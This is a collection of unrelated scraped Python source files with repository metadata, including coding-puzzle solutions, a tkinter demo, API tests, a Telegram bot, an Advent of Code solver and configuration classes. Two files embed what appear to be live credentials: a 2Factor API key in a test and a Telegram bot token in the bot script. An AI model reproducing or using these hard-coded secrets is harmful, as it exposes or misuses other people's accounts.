            elif j == 0 or typed[j] != typed[j-1]:
                return False  # typed[j] is neither expected nor a long-press repeat
            j+=1
return i==n | komalupatil/Leetcode_Solutions | Easy/Long Pressed Name.py | Long Pressed Name.py | py | 405 | python | en | code | 1 | github-code | 13 |
2495577781 |
import tkinter as tk
from tkinter import *
import socket
import webbrowser
def helloWorld():
    """Demo button callback: just prints a marker to stdout."""
    print('helloWorld')
def findIP():
    """Print this machine's IP address as resolved from its hostname."""
    print(socket.gethostbyname(socket.gethostname()))
def getIp():
    """Stub callback for the 'other IP' button -- only prints '##' for now."""
    print('##')
## Create Buttons
def createBtnQuit(name1):
    """Open a 500x700 window with one button (labelled *name1*) that
    destroys the window when clicked; blocks in mainloop()."""
    root = tk.Tk()
    root.geometry('500x700')
    btn = tk.Button(root, text = name1, bd = '5', command = root.destroy)
    btn.pack(side = 'top')
    root.mainloop()
def createBtnFunc(cancel, Func):
    """Open a window with two buttons: *cancel* quits the mainloop and
    *Func* triggers the helloWorld callback; blocks in mainloop()."""
    root = tk.Tk()
    frame = tk.Frame(root)
    frame.pack()
    btn = tk.Button(frame, text=cancel, fg="red",command=root.quit)
    btn.pack(side=tk.LEFT)
    slogan = tk.Button(frame,text=Func,command=helloWorld)
    slogan.pack(side=tk.RIGHT)
    root.mainloop()
def createBtnIp(mine, other):
    """Open a window with two buttons: *mine* prints the local IP via
    findIP and *other* calls the getIp stub; blocks in mainloop()."""
    root = tk.Tk()
    frame = tk.Frame(root)
    frame.pack()
    slogan = tk.Button(frame,text=mine,command=findIP)
    slogan.pack(side=tk.LEFT)
    btn = tk.Button(frame, text=other, fg="red",command=getIp)
    btn.pack(side=tk.RIGHT)
    root.mainloop()
#createBtnQuit('Cancel ##')
#createBtnFunc('Quit', 'helloWorld')
#createBtnIp('myIp', 'otherIp')
## Create Webpage opener
def openWebpage(src):
    """Open *src* in the default browser exactly as given."""
    return webbrowser.open(str(src))
def openWebpageHttp(src):
    """Open *src* in the default browser with an https:// prefix."""
    url = 'https://' + str(src)
    return webbrowser.open(url)
def openWebpageWWW(src):
    """Open *src* in the default browser with an https://www. prefix."""
    url = 'https://www.' + str(src)
    return webbrowser.open(url)
def openWebpages(pages, pages1, pages2):
    """Open three batches of pages: *pages* via https://, *pages1* via
    https://www., and *pages2* exactly as given."""
    batches = ((openWebpageHttp, pages),
               (openWebpageWWW, pages1),
               (openWebpage, pages2))
    for opener, batch in batches:
        for src in batch:
            opener(src)
# First batch: opened with an https:// prefix (repos, drive, mail inboxes).
intro = [
    'github.com/Laufer4u?tab=repositories',
    'drive.google.com/drive/my-drive',
    'mail.uoc.gr/imp/dynamic.php?page=mailbox#mbox:SU5CT1g',
    'mail.google.com/mail/u/0/#inbox']
# Second batch: opened with an https://www. prefix.
second = [
    'google.com',
    'youtube.com',
    'facebook.com',
    'w3schools.com/js/default.asp',
    'w3schools.com/python/default.asp']
# Third batch: opened verbatim (currently empty).
third = []
# NOTE(review): runs at import time and opens every page above in the browser.
openWebpages(intro, second, third)
| nzevgolisda/tkinter.py | main.py | main.py | py | 1,930 | python | en | code | 0 | github-code | 13 |
73260107856 | #from _2factor_wrapper import _2Factor
from _2factor_wrapper.Configure2Factor import Configure2Factor
import unittest
def verify_api():
    """Smoke-test the 2Factor API by calling verify() with a hard-coded key.

    NOTE(review): the `from _2factor_wrapper import _2Factor` import at the
    top of this file is commented out, so calling this function raises
    NameError until it is restored. The API key embedded below should also
    be moved out of source control.
    """
    instance = _2Factor(api_key='293832-67745-11e5-88de-5600000c6b13')
    response = instance.verify()
    assert isinstance(response, dict)
    assert response['status'] == "True"
class Test2FactorConfiguration(unittest.TestCase):
    """Unit tests for Configure2Factor's API-key accessors."""
    def test_set_api_key(self):
        # set_api_key is expected to echo back the key it stored
        self.assertEqual(Configure2Factor.set_api_key(api_key='1234'), '1234')
        self.assertNotEqual(Configure2Factor.set_api_key(api_key='1234'), '9090')
    def test_get_api_key_after_setting(self):
        # get_api_key should return whatever the last set_api_key call stored
        self.assertIsNotNone(Configure2Factor.set_api_key(api_key='1234'))
        self.assertEqual(Configure2Factor.set_api_key(api_key='1234'), Configure2Factor.get_api_key())
if __name__ == '__main__':
unittest.main() | chiseledCoder-zz/2factor-py | tests/tests.py | tests.py | py | 837 | python | en | code | 0 | github-code | 13 |
71984698257 | # SWEA 1486번 장훈이의 높은 선반
'''
SWEA 1486: there is a shelf of height B.
Clerk i has height Hi; clerks stack into a "tower" to reach items on the shelf.
A tower's height equals the single clerk's height when one clerk is used,
and the sum of all participating clerks' heights when two or more are used.
Find the height of the lowest tower that still reaches the shelf (>= B).
'''
def backtrack(n,sum_):
    """Explore every include/exclude subset of clerk heights, tracking the
    smallest subset sum that is >= B in the global min_sum."""
    global min_sum
    # pruning
    if sum_ >= min_sum: # adding more clerks only grows the sum, so stop here
        return
    if B == min_sum: # a tower of exactly height B is optimal -- nothing can beat it
        return
    if n == N: # past the last clerk: a complete subset has been chosen
        if sum_ >= B: # only towers that actually reach the shelf count
            min_sum = min(sum_, min_sum) # keep the lowest qualifying tower
        return
    backtrack(n+1, sum_ + lst[n])  # include clerk n in the tower
    backtrack(n+1, sum_)           # exclude clerk n
T = int(input())
for test_case in range(1,T+1):
    N,B = map(int,input().split()) # N = number of clerks, B = shelf height
    lst = list(map(int,input().split()))  # the clerks' heights
    sum_ = 0
    min_sum = 20*10000  # upper bound on any tower (presumably <= 20 clerks of height <= 10000 -- from the problem limits)
    backtrack(0,sum_)
    ans = min_sum-B  # how far the lowest reaching tower overshoots the shelf
print(f'#{test_case} {ans}') | euneuneunseok/TIL | SWEA/D4/1486. 장훈이의 높은 선반/장훈이의 높은 선반.py | 장훈이의 높은 선반.py | py | 1,140 | python | ko | code | 0 | github-code | 13 |
13885045762 | import json
import os
import copy
# format start,end to :00 or :30 format
def processHour(start, end):
    """Snap an interval of HHMM-style integer times outward onto the
    half-hour grid used by the room schedules.

    start is floored to the :00/:30 boundary containing it; end is pushed
    up to the next boundary after it (an exact :00 end becomes :30, an
    exact :30 end becomes the next :00).  Example: (845, 900) -> (830, 930).
    """
    # Use floor division so the result is an int on both Python 2 and 3;
    # the original `start / 100` truncated only under Python 2 and produced
    # floats (e.g. 830.0 instead of 800) under Python 3.
    if 0 <= (start % 100) < 30:
        start = (start // 100) * 100
    else:
        start = (start // 100) * 100 + 30
    if 0 <= (end % 100) < 30:
        end = (end // 100) * 100 + 30
    else:
        end = (end // 100) * 100 + 100
    return start, end
# direction :
# has a bunch of rooms:
# room : [{},{},{}]
# {} = day ; time
# day = monday,tuesday...
# time = [8:30->9-20; ...]
with open("rooms.txt","r") as f :
#prepare hourList template
hours = open("dayTemplate.txt","r");
hourList = hours.read().split("\n")
hours.close()
hourList.remove("")
errors = 0;
#prepare rooms list
read = f.read().split("\n");
rooms = {}
for mini_room in read :
#prepare dayList template
date = ["M","T","W","R","F","S"]
#create schedule template for each room
dataDay = {}
for unit in date :
dataDay[unit] = hourList[:]
rooms[mini_room] = dataDay;
rooms.pop("",None);
with open("final.json","r") as g :
allCourses = json.load(g);
for course in allCourses :
for courseObj in course["courses"]:
for offering in courseObj["offerings"]:
for section in offering["component"]:
try :
if "room" not in section or section['room'] == "WWW" or len(section["days"]) < 4 or len(section["time"]) < 4:
#filter bad data
continue;
else :
#check for used date, remove from schedule-free list, leaving only the free hours for the room
#check through monday to saturday
start = int(section["time"].split("-")[0]);
end = int(section["time"].split("-")[1]);
#format start,end to :00 or :30 format
start,end = processHour(start,end);
#get monday to friday schedules of this room
for dateCode in rooms[section["room"]].keys() :
#if found a matched date
if section["days"].find(dateCode) > -1 :
#scan the hours left in monday->friday schedule
newHours = [];
for hour in rooms[section["room"]][dateCode]:
if int(hour) < start or int(hour) >= end:
newHours.append(hour)
rooms[section["room"]][dateCode] = newHours
print("vvvvvvvvvvvvvvv");
print(newHours)
except (Exception) as e :
#if time does not exist (on-site class)
errors+=1;
print("skipped an invalid "+courseObj["course_id"]+section["days"]+section["time"])
print(e)
continue;
with open("days.json","w+") as writer :
print(str(errors)+" errors");
writer.write(json.dumps(rooms, indent=4,sort_keys=True));
| ikendoit/Langara-Scraper | roomLangara/getDays.py | getDays.py | py | 3,720 | python | en | code | 0 | github-code | 13 |
43026577034 | from aiogram import Bot, Dispatcher, types
from aiogram.utils import executor
# SECURITY(review): a real-looking bot token is hard-coded here -- it should
# be revoked and loaded from an environment variable or config file instead.
bot = Bot(token='1650077573:AAHfZMCUxCyMdBE42gpK9JPRcRVD0O2k_gQ')
dp = Dispatcher(bot)
@dp.message_handler()
async def get_message(message: types.Message):
    """Reply to every incoming message with a fixed text and print the
    Message object that send_message returned."""
    chat_id = message.chat.id
    text = 'Какой-то другой текст'
    sent_message = await bot.send_message(chat_id=chat_id, text=text)
    print(sent_message)
# Start long polling; blocks until the process is stopped.
executor.start_polling(dp)
| pol1969/aiogram | app.py | app.py | py | 443 | python | en | code | 0 | github-code | 13 |
28568289611 | import os
from typing import Any, Union, List
from pibble.api.configuration import APIConfiguration
from pibble.api.helpers.store import APISessionStore, UnconfiguredAPISessionStore
from pibble.api.exceptions import ConfigurationError
from pibble.util.log import logger, ConfigurationLoggingContext
from pibble.util.strings import pretty_print, get_uuid
class APIBase:
    """
    A base class for servers and clients to inherit from.

    Provides configuration storage, an optional session store, and
    lifecycle hooks (on_configure / on_destroy) that are invoked across
    the whole MRO by configure() and destroy().
    """

    session: Union[UnconfiguredAPISessionStore, APISessionStore]

    def __init__(self) -> None:
        logger.debug("Initializing API base.")
        self.configuration = APIConfiguration()
        self.configuration.put("session_key", get_uuid())
        self.session = UnconfiguredAPISessionStore()

    def on_configure(self) -> None:
        """
        Establishes session store, if able.
        Also configures logger and sets CWD.
        """
        if "logging" in self.configuration:
            context = ConfigurationLoggingContext(self.configuration)
            context.start()
            logger.debug("Established configured logger.")
        if "cwd" in self.configuration:
            cwd = self.configuration["cwd"]
            if "~" in cwd:
                cwd = os.path.expanduser(cwd)
            logger.debug(f"Changing to working directory {cwd}")
            os.chdir(cwd)
        if (
            isinstance(self.session, UnconfiguredAPISessionStore)
            and "session.store" in self.configuration
        ):
            logger.debug("Establishing configured session store.")
            self.session = APISessionStore(self.configuration)

    def destroy(self) -> None:
        """
        Destroys the API, clearing any state.

        Runs every class's own on_destroy handler, base classes first.
        :raises ConfigurationError: if any handler fails.
        """
        for cls in reversed(type(self).mro()):
            if hasattr(cls, "on_destroy") and "on_destroy" in cls.__dict__:
                try:
                    logger.debug(
                        "Destruction handler found for superclass {0}, executing.".format(
                            cls.__name__
                        )
                    )
                    cls.on_destroy(self)
                except Exception as ex:
                    # Chain the original exception so its traceback survives.
                    raise ConfigurationError(str(ex)) from ex

    def configure(self, **configuration: Any) -> None:
        """
        Updates the configuration and runs every class's own on_configure
        handler, base classes first.

        :param configuration: any number of configuration values to update.
        :raises ConfigurationError: if any handler fails.
        """
        self.configuration.update(**configuration)
        logger.debug(
            "Configuration updated on class {0}. Supers are {1}".format(
                type(self).__name__,
                pretty_print(*[cls.__name__ for cls in type(self).mro()]),
            )
        )
        for cls in reversed(type(self).mro()):
            if hasattr(cls, "on_configure") and "on_configure" in cls.__dict__:
                try:
                    logger.debug(
                        "Configuration update handler found for superclass {0}, executing.".format(
                            cls.__name__
                        )
                    )
                    cls.on_configure(self)
                except Exception as ex:
                    # Chain the original exception so its traceback survives.
                    raise ConfigurationError(str(ex)) from ex

    def listMethods(self) -> List[str]:
        """
        Should be extended for function-based servers or clients.
        """
        raise NotImplementedError()
| painebenjamin/pibble | api/base.py | base.py | py | 3,374 | python | en | code | 1 | github-code | 13 |
72102798739 | from ast import Break
# NOTE(review): this import is unused, and asyncio.windows_events only exists
# on Windows (ImportError on other platforms); the `from ast import Break`
# import above is unused as well. Consider deleting both.
from asyncio.windows_events import INFINITE
while True:
while True:
try:
problema = int(input("Dame un numero de problema entre 1-10: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if problema == 22:
exit()
elif problema < 1 or problema > 10:
print("Ese problema no existe -_-")
continue
else:
break
if problema == 1:
while True:
print("Dabes de ser mayor de edad")
try:
edad = int(input("Cual es tu edad: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if edad < 18:
print("No eres mayor de edad -_-")
continue
else:
break
print("Eres mayor de edad, tienes:",edad,"años ^w^")
elif problema == 2:
while True:
try:
num = int(input("Dame un numero positvo: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num < 0:
print("No es positivo -_-")
continue
else:
break
print("Eres mayor de edad ^w^")
elif problema == 3:
while True:
try:
num = int(input("Dame un numero par y multiplo de 3: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num % 2 != 0 and num % 3 == 0:
print("El numero no es par -_-")
continue
elif num % 2 == 0 and num % 3 != 0:
print("El numero no es multiplo de 3 -_-")
continue
elif num % 2 != 0 and num % 3 != 0:
print("El numero no es ni par ni multiplo de 3 -_-")
continue
else:
break
print("Es multiplo de 3 y es par ^w^")
elif problema == 4:
while True:
print("Dame tu edad y la de tu amigo")
try:
edad = int(input("Cual es tu edad: "))
edad_amigo = int(input("Cual es la edad de tu amigo: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if edad < 18 and edad_amigo >= 18:
print("No eres mayor de edad -_-")
continue
elif edad >= 18 and edad_amigo < 18:
print("Tu amigo no es mayor de edad -_-")
continue
elif edad < 18 and edad_amigo < 18:
print("Ninguno es mayor de edad -_-")
continue
else:
break
print("Son mayores de edad, tienen:",edad,"años",edad_amigo,"años ^w^")
elif problema == 5:
while True:
print("Dame tres numero consecutivos acendentes")
try:
num1 = int(input("Cual es el primer numero: "))
num2 = int(input("Cual es el segundo numero: "))
num3 = int(input("Cual es el tercer numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num1 > num2 or num2 > num3:
print("No son acendentes -_-")
continue
elif num2 != num1 + 1 or num3 != num2 + 1:
print("No son consecutivos -_-")
continue
else:
break
print("Son numero consecutivos acendentes ^w^")
elif problema == 6:
while True:
print("Alguno debe de ser mayor de edad")
try:
edad = int(input("Cual es tu edad: "))
edad_a1 = int(input("Cual es su edad: "))
edad_a2 = int(input("Cual es su edad: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if edad >17 or edad_a1 > 17 or edad_a2 > 17:
break
else:
print("Ninguno es mayor de edad")
continue
print("Alguno es mayor de edad ^w^")
elif problema == 7:
while True:
print("Dame tres numeros acendentes")
try:
num1 = int(input("Cual es el primer numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
while True:
try:
num2 = int(input("Cual es el segundo numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num2 <= num1:
print("No son acendentes -_-")
continue
else:
while True:
try:
num3 = int(input("Cual es el tercer numero: "))
except ValueError:
print("Debes escribir un número -_-")
continue
if num3 <= num2:
print("No son acendentes -_-")
continue
else:
break
break
break
print("Son numero consecutivos acendentes ^w^")
elif problema == 8:
while True:
print("Dame una palabra de 8 letras")
palabra = input("La palabra es: ")
if len(palabra) < 8:
print("Tiene menos de 8 letras-_-")
continue
else:
break
print("Tiene 8 letras o mas ^w^")
elif problema == 9:
while True:
print("Dame una palabra que termine en N S o vocal")
palabra = input("La palabra es: ")
lis=["n","s","a","e","i","o","u"]
if palabra[-1] in lis:
break
else:
print("No termina en N S o vocal")
continue
print("Termina en N s o vocal ^w^")
elif problema == 10:
while True:
palabra = input("Dame una frase que termine con un sogno de puntucion: ")
lis=[".","!","?",";",",",":"]
if palabra[-1] in lis:
break
else:
print("No termina con un signo de puntucion -_-")
continue
print("Si tienete signo de puntucion final ^w^")
| XTEP63/Practicas-y-Tareas-ITESO | OS22b/Tareas/tarea6.py | tarea6.py | py | 6,836 | python | es | code | 3 | github-code | 13 |
34421121778 | # coding=utf-8
"""Tools used for solving the Day 24: Blizzard Basin puzzle."""
# Standard library imports:
from typing import Iterable
# Third party imports:
from aoc_tools.algorithms.graphs.a_star_search import ASNode, a_star_search
# Set constants:
DELTA_MAP = {"^": (0, 1), ">": (1, 0), "v": (0, -1), "<": (-1, 0)}
class Cell:
    """2D discrete location inside the blizzard valley.

    Equality, ordering and hashing are based solely on the (x, y) pair,
    so subclasses (e.g. Blizzard) compare equal to a Cell at the same spot.
    """
    __slots__ = ["x", "y", "_id", "_hash"]

    def __init__(self, x: int, y: int):
        self.x, self.y = x, y
        self._id = (x, y)
        # Pre-computed: cells are hashed heavily in set/dict operations.
        self._hash = hash((x, y))

    def __repr__(self) -> str:
        return str(self._id)

    def __eq__(self, other) -> bool:
        # Return NotImplemented (instead of raising AttributeError) when
        # compared against a non-Cell, so `==` degrades gracefully.
        if not isinstance(other, Cell):
            return NotImplemented
        return self._id == other._id

    def __lt__(self, other) -> bool:
        if not isinstance(other, Cell):
            return NotImplemented
        return self._id < other._id

    def __hash__(self) -> int:
        return self._hash

    def calc_distance(self, other: "Cell") -> int:
        """Compute the Manhattan distance between this Cell and another Cell."""
        return abs(other.x - self.x) + abs(other.y - self.y)
class Region:
    """Rectangular 2D area of discrete cells, bounded inclusively on both axes."""
    __slots__ = ["min_x", "max_x", "min_y", "max_y", "cells"]

    def __init__(self, min_x: int, max_x: int, min_y: int, max_y: int,
                 other: "set[Cell]"):
        self.min_x, self.max_x = min_x, max_x
        self.min_y, self.max_y = min_y, max_y
        self.cells = self._get_region_cells() | other

    def _get_region_cells(self) -> "set[Cell]":
        """Build one Cell for every (x, y) location within the region limits."""
        return {Cell(x=col, y=row)
                for col in range(self.min_x, self.max_x + 1)
                for row in range(self.min_y, self.max_y + 1)}

    def warp_location(self, x: int, y: int) -> tuple[int, int]:
        """Wrap an out-of-bounds XY point around to the opposite edge."""
        if x < self.min_x:
            x = self.max_x
        elif x > self.max_x:
            x = self.min_x
        if y < self.min_y:
            y = self.max_y
        elif y > self.max_y:
            y = self.min_y
        return x, y
class Blizzard(Cell):
    """Snow-and-ice front blown by the strong winds inside the valley.

    Inherits equality/hashing from Cell, which compare only (x, y) -- two
    blizzards on the same cell are treated as equal regardless of direction.
    """
    __slots__ = ["direction", "deltas"]
    def __init__(self, x: int, y: int, direction: str):
        super().__init__(x=x, y=y)
        # direction is one of "^", ">", "v", "<" (a key of DELTA_MAP)
        self.direction = direction
        self.deltas = DELTA_MAP[direction]
    def __repr__(self) -> str:
        return f"{self._id} {self.direction}"
    def move(self, region: Region) -> "Blizzard":
        """New Blizzard located one Cell forward on the direction of this Blizzard."""
        dx, dy = self.deltas
        x, y = self.x + dx, self.y + dy
        # Blizzards wrap around to the opposite side of the valley.
        x, y = region.warp_location(x=x, y=y)
        return Blizzard(x=x, y=y, direction=self.direction)
class SnowMap:
"""Tool for predicting the position of every blizzard blowing over the valley."""
__slots__ = ["region", "_blizzard_log", "_calm_log"]
def __init__(self, blizzards: list[Blizzard], region: Region):
self.region = region
self._blizzard_log = {0: [*blizzards]}
self._calm_log = {}
def forecast_calms(self, t: int) -> set[Cell]:
"""Compose a set of all cells without active blizzards at the target instant."""
try:
return self._calm_log[t]
except KeyError:
calm_cells = self.region.cells - set(self.forecast_blizzards(t=t))
self._calm_log.update({t: calm_cells})
return calm_cells
def forecast_blizzards(self, t: int) -> list[Blizzard]:
"""List all active blizzards at the target instant."""
try:
return self._blizzard_log[t]
except KeyError:
self._update_blizzard_log(up_to_t=t)
return self._blizzard_log[t]
def _update_blizzard_log(self, up_to_t: int):
"""Simulate and log blizzards for new time instants up to t."""
last_t = max(self._blizzard_log.keys())
blizzards = self._blizzard_log[last_t]
for t in range(last_t + 1, up_to_t + 1):
blizzards = [blz.move(region=self.region) for blz in blizzards]
self._blizzard_log[t] = blizzards
@classmethod
def from_strings(cls, strings: list[str], region: Region) -> "SnowMap":
"""Create a new SnowMap from strings describing valley's initial state."""
blizzards = cls._parse_blizzards(strings=strings)
return SnowMap(blizzards=blizzards, region=region)
@staticmethod
def _parse_blizzards(strings: list[str]) -> list[Blizzard]:
"""Build blizzard cells from strings describing the valley's initial state."""
arrows = "^", ">", "v", "<"
blizzards = []
for y, string in enumerate(strings[::-1]):
blizzards.extend(Blizzard(x=x, y=y, direction=value)
for x, value in enumerate(string) if value in arrows)
return blizzards
class Expedition(ASNode):
"""Group of star-fruit-gatherers traversing the valley one cell at a time."""
__slots__ = ["cell", "t", "goal", "snow_map"]
def __init__(self, cell: Cell, t: int, goal: Cell, snow_map: SnowMap,
parent: "Expedition" = None):
self.cell, self.t = cell, t
self.goal, self.snow_map = goal, snow_map
id_ = cell, t, tuple(sorted(self.reachable_cells))
super().__init__(id_=id_, hash_=hash(id_), parent=parent)
def __repr__(self) -> str:
return f"{self.cell}: {len(self.reachable_cells)} moves ({self.t} min)"
@property
def g(self) -> int:
"""Compute the cost for reaching the current location from the start point."""
return self.t
@property
def h(self) -> int:
"""Estimate the cost for reaching the search goal from the current location."""
return self.cell.calc_distance(other=self.goal)
def get_successors(self) -> Iterable["Expedition"]:
"""List all the immediate paths this Expedition could take from its location."""
t = self.t + 1
calm_cells = self.snow_map.forecast_calms(t=t)
for cell in self.reachable_cells & calm_cells:
yield Expedition(cell=cell, t=t, goal=self.goal, snow_map=self.snow_map,
parent=self)
@property
def is_at_goal(self) -> bool:
"""Check if this Expedition is currently at the goal cell."""
return self.cell == self.goal
@property
def reachable_cells(self) -> set[Cell]:
"""Set of all cells this Expedition could reach in one time step."""
deltas = list(DELTA_MAP.values()) + [(0, 0)]
return {Cell(x=self.cell.x + dx, y=self.cell.y + dy) for dx, dy in deltas}
class Valley:
    """Mountain-walled, blizzard-swept rectangular area with only two exit points."""
    def __init__(self, region: Region, snow_map: SnowMap, start: "Cell", goal: "Cell"):
        """Store the valley's bounds, blizzard forecaster and the two openings."""
        self.region, self.snow_map = region, snow_map
        self.start, self.goal = start, goal
    def plan_travel_to_goal(self, t: int) -> Expedition:
        """Find the shortest path through the blizzards from the start to the goal."""
        start = Expedition(cell=self.start, t=t, goal=self.goal, snow_map=self.snow_map)
        goal = a_star_search(start=start, goal_func=lambda node: node.is_at_goal)
        return goal
    def plan_travel_to_start(self, t: int) -> Expedition:
        """Find the shortest path through the blizzards from the goal to the start."""
        start = Expedition(cell=self.goal, t=t, goal=self.start, snow_map=self.snow_map)
        goal = a_star_search(start=start, goal_func=lambda node: node.is_at_goal)
        return goal
    @property
    def mountains(self) -> set[Cell]:
        """Cells defining the mountains that wall the Valley (exits excluded)."""
        length = self.region.max_y - self.region.min_y + 3
        width = self.region.max_x - self.region.min_x + 3
        bottom_wall = {Cell(x=x, y=0) for x in range(width)}
        top_wall = {Cell(x=x, y=length - 1) for x in range(width)}
        left_wall = {Cell(x=0, y=y) for y in range(1, length - 1)}
        right_wall = {Cell(x=width - 1, y=y) for y in range(1, length - 1)}
        # BUG FIX: '-' binds tighter than '|', so the original expression only
        # removed the exit cells from right_wall; parenthesize the union so the
        # start and goal openings are carved out of the walls that contain them.
        return (top_wall | bottom_wall | left_wall | right_wall) - {self.start, self.goal}
    @classmethod
    def from_strings(cls, strings: list[str]) -> "Valley":
        """Create a new Valley from the strings describing its initial state."""
        length, width = len(strings), len(strings[0])
        # The single '.' in the first/last sketch row marks each opening.
        start = Cell(x=strings[0].index("."), y=length - 1)
        goal = Cell(x=strings[-1].index("."), y=0)
        region = Region(
            min_x=1, max_x=width - 2, min_y=1, max_y=length - 2, other={start, goal})
        snow_map = SnowMap.from_strings(strings=strings, region=region)
        return Valley(region=region, start=start, goal=goal, snow_map=snow_map)
| JaviLunes/AdventCode2022 | src/aoc2022/day_24/tools.py | tools.py | py | 8,908 | python | en | code | 0 | github-code | 13 |
10045945107 | from random import randint
# Magic 8-Ball answer pool.  NOTE(review): 'Yes Signs point to yes' looks like
# two canonical answers fused together, and 'Reply hazy', 'try again' like one
# answer split in two -- confirm the intended wording.
answers = ['Outlook good', 'Yes Signs point to yes', 'Reply hazy', 'try again', 'Ask again later', 'Better not tell you now','It is certain', 'It is decidedly so', 'Without a doubt', 'Yes – definitely', 'You may rely on it', 'As I see it, yes', 'Most likely', 'Cannot predict now', 'Concentrate and ask again', 'Dont count on it', 'My reply is no', 'My sources say no', 'Outlook not so good', 'Very doubtful']
print ("hello stranger! I am the magic 8 ball")
print("**************")
def Magic8Ball():
    """Answer one question, then keep prompting until the user answers Y or N."""
    print("Ask me a question")
    input()  # the question text itself is ignored; any input works
    print(answers[randint(0, len(answers) - 1)])
    print("I hope that helped.")
    # FIX: the original asked again after an invalid choice but threw the
    # second answer away and silently exited; loop until we get a Y or an N.
    while True:
        choice = Replay()
        if choice == "Y":
            Magic8Ball()
            return
        elif choice == "N":
            return
        else:
            print("I did not understand! Please repeat.")
def Replay():
    """Ask whether the user has another question; return the raw input ('Y'/'N' expected)."""
    # FIX: corrected the prompt typo "Type Y is yes" -> "Type Y if yes".
    print("Do you have another question? Type Y if yes and N if no")
    choice = input()
    return choice
# Entry point: run the interactive loop, then say goodbye.
Magic8Ball()
print("I hope you got your answers")
| arnavpshah/arnavpshah-Python | magic_8_ball.py | magic_8_ball.py | py | 1,023 | python | en | code | 0 | github-code | 13 |
class Solution(object):
    """Three approaches to LeetCode 35 (Search Insert Position).

    Given a sorted list of distinct integers and a target, return the index at
    which the target is found, or the index where it would be inserted.
    """
    # Linear scan from the left, running time O(n).
    def searchInsert(self, nums, target):
        length, index = len(nums), 0
        while index < length:
            if nums[index] >= target:
                return index
            else:
                index += 1
        # target exceeds every element (or nums is empty)
        return index
    # Scan from both ends simultaneously, running time O(n/2).
    def second_solution(self, nums, target):
        length = len(nums)
        i, j = 0, length - 1
        while i <= j:
            num_i, num_j = nums[i], nums[j]
            if num_i < target and num_j >= target:
                i += 1
                j -= 1
            elif num_i < target:
                # both ends below target -> insert just past the right end
                return j + 1
            else:
                return i
        return i
    # Binary search, running time O(log n).
    def third_solution(self, nums, target):
        length = len(nums)
        start, end = 0, length - 1
        # FIX: use floor division (//) so the midpoint stays an integer index
        # on Python 3; the original '/' produced a float there.
        mid = (start + end) // 2
        while (start <= end):
            if nums[start] >= target:
                return start
            if nums[end] < target:
                return end + 1
            if nums[end] == target:
                return end
            mid_v = nums[mid]
            if mid_v == target:
                return mid
            elif mid_v < target:
                start = mid + 1
                mid = (start + end) // 2
            else:
                end = mid - 1
                mid = (start + end) // 2
        # FIX: empty input previously fell through and returned None.
        return start
| clovery410/mycode | leetcode/35search_insert_position.py | 35search_insert_position.py | py | 1,513 | python | en | code | 1 | github-code | 13 |
14646907565 | from sqlalchemy import Column, Identity, Integer, String, Table
from . import metadata
# Table mirroring Stripe's subscription "pending_invoice_item_interval" object.
SubscriptionPendingInvoiceItemIntervalJson = Table(
    "subscription_pending_invoice_item_intervaljson",
    metadata,
    Column(
        "interval",
        String,
        comment="Specifies invoicing frequency. Either `day`, `week`, `month` or `year`",
    ),
    Column(
        "interval_count",
        Integer,
        comment="The number of intervals between invoices. For example, `interval=month` and `interval_count=3` bills every 3 months. Maximum of one year interval allowed (1 year, 12 months, or 52 weeks)",
    ),
    Column("id", Integer, primary_key=True, server_default=Identity()),
)

# FIX: __all__ must list the public Python name this module defines.  The
# original listed the source schema file name ("...interval.json"), which is
# not even a valid identifier, so `from module import *` exported nothing.
__all__ = ["SubscriptionPendingInvoiceItemIntervalJson"]
| offscale/stripe-sql | stripe_openapi/subscription_pending_invoice_item_interval.py | subscription_pending_invoice_item_interval.py | py | 758 | python | en | code | 1 | github-code | 13 |
37943988708 | # Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
from HepMCAnalysis_i.HepMCAnalysis_iConf import HepMCAnalysis
class HepMCAnalysis_i(HepMCAnalysis):
    """Athena configurable for the HepMCAnalysis algorithm: picks the output
    ROOT file and makes sure a THistSvc instance is registered and wired in."""
    def __init__(self, name = "HepMCAnalysis_i", file = None):
        # name: Gaudi component instance name; file: optional output ROOT file path.
        super( HepMCAnalysis_i, self ).__init__( name )
        self.OutputFile = "hepmcanalysis.root"
        from AthenaCommon.Logging import logging
        log = logging.getLogger( 'HepMCAnalysis_i' )
        # set defaults
        if file:
            self.OutputFile = file
            log.info("changing output file name to %s" % self.OutputFile)
        # create THistSvc if not yet done
        from AthenaCommon.AppMgr import ServiceMgr as svcMgr
        if not hasattr( svcMgr, "THistSvc"):
            log.info("will setup THistSvc and add instance to ServiceMgr")
            from GaudiSvc.GaudiSvcConf import THistSvc
            myHistSvc = THistSvc()
            svcMgr += myHistSvc
        else:
            myHistSvc = svcMgr.THistSvc
        # defining stream and output file
        log.info("here0")  # NOTE(review): leftover debug output -- consider removing
        log.info("Output file: %s" % self.OutputFile)
        myHistSvc.Output += [ ("hepmcanalysis DATAFILE='%s' OPT='RECREATE'" % self.OutputFile)] ####if this line is commented in the segmentation fault appears!!!!!
        myHistSvc.OutputLevel = 1
        #####if the above line is commented out then the segmentation fault appears at event number 5!!!!! STRANGE!!!!!
        #myHistSvc.Output += [ ("hepmcanalysis DATAFILE='test.root' OPT='RECREATE'") ]
        # overriding default IHistSvc in algorithm
        self.ITHistSvc = myHistSvc
        #self.ITHistSvc.Output = [ ("hepmcanalysis DATAFILE='%s' OPT='RECREATE'" % self.OutputFile)] ####if this line is commented in the segmentation fault appears!!!!!
        #####if the above line is commented out then the segmentation fault appears at event number 5!!!!! STRANGE!!!!!
| rushioda/PIXELVALID_athena | athena/Generators/HepMCAnalysis_i/python/HepMCAnalysis_iConfig.py | HepMCAnalysis_iConfig.py | py | 1,957 | python | en | code | 1 | github-code | 13 |
14979063472 | from datetime import date
from rest_framework import serializers
from django.db import models
from basemodels import UserData, Stock, StockData, Product, Nature, ProductSupplier, \
ProductPacking, StockMovement, PurchaseDocuments, Company, Installation, Lagerausgang, InstallationLinks, \
InstallationConsumption, InstallationCounterHistory, ProductType
from models import Supplier01, PurchaseDoc01
from django.contrib.auth.models import User, Group
